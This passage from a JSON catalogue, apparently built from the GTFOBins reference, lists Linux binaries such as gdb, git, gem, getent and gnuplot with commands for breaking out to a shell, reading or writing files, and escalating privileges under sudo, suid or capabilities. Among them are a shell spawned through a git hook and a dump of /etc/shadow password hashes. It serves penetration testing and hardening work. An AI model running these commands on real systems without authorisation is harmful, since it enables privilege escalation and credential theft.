installation","aliases":[]},{"id":"gtfo:gdb:shell:0:capabilities","toolId":"gtfo:gdb","toolName":"gdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gdb -nx -ex 'python import os; os.setuid(0)' -ex '!/bin/sh' -ex quit","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:shell:0:sudo","toolId":"gtfo:gdb","toolName":"gdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gdb -nx -ex '!/bin/sh' -ex quit","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:shell:0:suid","toolId":"gtfo:gdb","toolName":"gdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gdb -nx -ex '!/bin/sh' -ex quit","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gdb:shell:0:unprivileged","toolId":"gtfo:gdb","toolName":"gdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gdb -nx -ex '!/bin/sh' -ex quit","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gdb/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gem:inherit:0:sudo","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"gem open debug","description":"This requires the name of an installed gem to be provided, e.g., `debug` is usually installed.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gem:inherit:0:unprivileged","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"gem open debug","description":"This requires the name of an installed gem to be provided, e.g., `debug` is usually installed.","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gem:inherit:1:sudo","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"gem build /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gem:inherit:1:unprivileged","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"gem build /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gem:inherit:2:sudo","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"gem install --file /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gem:inherit:2:unprivileged","toolId":"gtfo:gem","toolName":"gem","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"gem install --file /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gem:shell:0:sudo","toolId":"gtfo:gem","toolName":"gem","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gem open -e '/bin/sh -s' debug","description":"This requires the name of an installed gem to be provided, e.g., `debug` is usually installed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gem:shell:0:unprivileged","toolId":"gtfo:gem","toolName":"gem","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"gem open -e '/bin/sh -s' debug","description":"This requires the name of an installed gem to be provided, e.g., `debug` is usually installed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gem/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genie:shell:0:sudo","toolId":"gtfo:genie","toolName":"genie","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"genie -c '/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/genie/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genie:shell:0:suid","toolId":"gtfo:genie","toolName":"genie","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"genie -c '/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/genie/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genie:shell:0:unprivileged","toolId":"gtfo:genie","toolName":"genie","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"genie -c '/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/genie/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genisoimage:file-read:0:sudo","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"genisoimage -q -o - /path/to/input-file","description":"The output is placed inside the ISO9660 file system binary format, it can be mounted or extracted with tools like `7z`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/genisoimage/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genisoimage:file-read:0:suid","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"genisoimage -q -o - /path/to/input-file","description":"The output is placed inside the ISO9660 file system binary format, it can be mounted or extracted with tools like `7z`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/genisoimage/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genisoimage:file-read:0:unprivileged","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"genisoimage -q -o - /path/to/input-file","description":"The output is placed inside the ISO9660 file system binary format, it can be mounted or extracted with tools like `7z`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/genisoimage/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genisoimage:file-read:1:sudo","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"genisoimage -sort /path/to/input-file","description":"The file is parsed, and some of its content is disclosed by the error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/genisoimage/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genisoimage:file-read:1:suid","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"genisoimage -sort /path/to/input-file","description":"The file is parsed, and some of its content is disclosed by the error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/genisoimage/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:genisoimage:file-read:1:unprivileged","toolId":"gtfo:genisoimage","toolName":"genisoimage","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"genisoimage -sort /path/to/input-file","description":"The file is parsed, and some of its content is disclosed by the error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/genisoimage/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:getent:privilege-escalation:0:sudo","toolId":"gtfo:getent","toolName":"getent","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"getent shadow","description":"This allows to dump password hashes from the `/etc/shadow` file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/getent/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:getent:privilege-escalation:0:suid","toolId":"gtfo:getent","toolName":"getent","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"getent shadow","description":"This allows to dump password hashes from the `/etc/shadow` file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/getent/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ghc:shell:0:sudo","toolId":"gtfo:ghc","toolName":"ghc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ghc -e 'System.Process.callCommand \"/bin/sh\"'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ghc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ghc:shell:0:unprivileged","toolId":"gtfo:ghc","toolName":"ghc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ghc -e 'System.Process.callCommand \"/bin/sh\"'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ghc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ghci:shell:0:sudo","toolId":"gtfo:ghci","toolName":"ghci","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ghci\nSystem.Process.callCommand \"/bin/sh\"","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ghci/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ghci:shell:0:unprivileged","toolId":"gtfo:ghci","toolName":"ghci","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ghci\nSystem.Process.callCommand \"/bin/sh\"","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ghci/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gimp:inherit:0:sudo","toolId":"gtfo:gimp","toolName":"gimp","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"gimp -idf --batch-interpreter=python-fu-eval -b '...'","description":"This allows to run Python code (`...`). It hangs afterwards and can be terminated by pressing `Ctrl-C`.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gimp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gimp:inherit:0:unprivileged","toolId":"gtfo:gimp","toolName":"gimp","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"gimp -idf --batch-interpreter=python-fu-eval -b '...'","description":"This allows to run Python code (`...`). It hangs afterwards and can be terminated by pressing `Ctrl-C`.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gimp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ginsh:shell:0:sudo","toolId":"gtfo:ginsh","toolName":"ginsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ginsh\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ginsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ginsh:shell:0:suid","toolId":"gtfo:ginsh","toolName":"ginsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ginsh\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ginsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ginsh:shell:0:unprivileged","toolId":"gtfo:ginsh","toolName":"ginsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ginsh\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ginsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:file-read:0:sudo","toolId":"gtfo:git","toolName":"git","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"git diff /dev/null /path/to/input-file","description":"The read file content is displayed in `diff` style output format.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:file-read:0:suid","toolId":"gtfo:git","toolName":"git","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"git diff /dev/null /path/to/input-file","description":"The read file content is displayed in `diff` style output format.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:file-read:0:unprivileged","toolId":"gtfo:git","toolName":"git","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"git diff /dev/null /path/to/input-file","description":"The read file content is displayed in `diff` style output format.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:file-write:0:sudo","toolId":"gtfo:git","toolName":"git","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"git apply --unsafe-paths --directory / x.patch","description":"The patch can be created locally by creating the file that will be written on the target using its absolute path:\n\n```\necho DATA >/path/to/input-file\ngit diff /dev/null /path/to/input-file >x.patch\n```","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:file-write:0:suid","toolId":"gtfo:git","toolName":"git","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"git apply --unsafe-paths --directory / x.patch","description":"The patch can be created locally by creating the file that will be written on the target using its absolute path:\n\n```\necho DATA >/path/to/input-file\ngit diff /dev/null /path/to/input-file >x.patch\n```","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:file-write:0:unprivileged","toolId":"gtfo:git","toolName":"git","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"git apply --unsafe-paths --directory / x.patch","description":"The patch can be created locally by creating the file that will be written on the target using its absolute path:\n\n```\necho DATA >/path/to/input-file\ngit diff /dev/null /path/to/input-file >x.patch\n```","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:inherit:0:sudo","toolId":"gtfo:git","toolName":"git","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"git help config","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:inherit:0:unprivileged","toolId":"gtfo:git","toolName":"git","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"git help config","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:inherit:1:sudo","toolId":"gtfo:git","toolName":"git","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"git branch --help config\n!/bin/sh","description":"The help system can also be reached from any `git` command, e.g., `git branch`.","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:inherit:1:unprivileged","toolId":"gtfo:git","toolName":"git","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"git branch --help config\n!/bin/sh","description":"The help system can also be reached from any `git` command, e.g., `git branch`.","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:shell:0:sudo","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"PAGER='/bin/sh -c \"exec sh 0<&1\"' git -p help","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:shell:0:unprivileged","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"PAGER='/bin/sh -c \"exec sh 0<&1\"' git -p help","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:shell:1:sudo","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"git init .\necho 'exec /bin/sh 0<&2 1>&2' >.git/hooks/pre-commit\nchmod +x .git/hooks/pre-commit\ngit -C . commit --allow-empty -m x","description":"Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used, and moving into the directory works too.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:shell:1:unprivileged","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"git init .\necho 'exec /bin/sh 0<&2 1>&2' >.git/hooks/pre-commit\nchmod +x .git/hooks/pre-commit\ngit -C . commit --allow-empty -m x","description":"Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used, and moving into the directory works too.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:shell:2:sudo","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ln -s /bin/sh git-x\ngit --exec-path=. x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:shell:2:suid","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ln -s /bin/sh git-x\ngit --exec-path=. x -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:git:shell:2:unprivileged","toolId":"gtfo:git","toolName":"git","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ln -s /bin/sh git-x\ngit --exec-path=. x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/git/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gnuplot:shell:0:sudo","toolId":"gtfo:gnuplot","toolName":"gnuplot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gnuplot -e 'system(\"/bin/sh 1>&0\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gnuplot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:gnuplot:shell:0:suid","toolId":"gtfo:gnuplot","toolName":"gnuplot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"gnuplot -e 'system(\"/bin/sh 1>&0\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gnuplot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 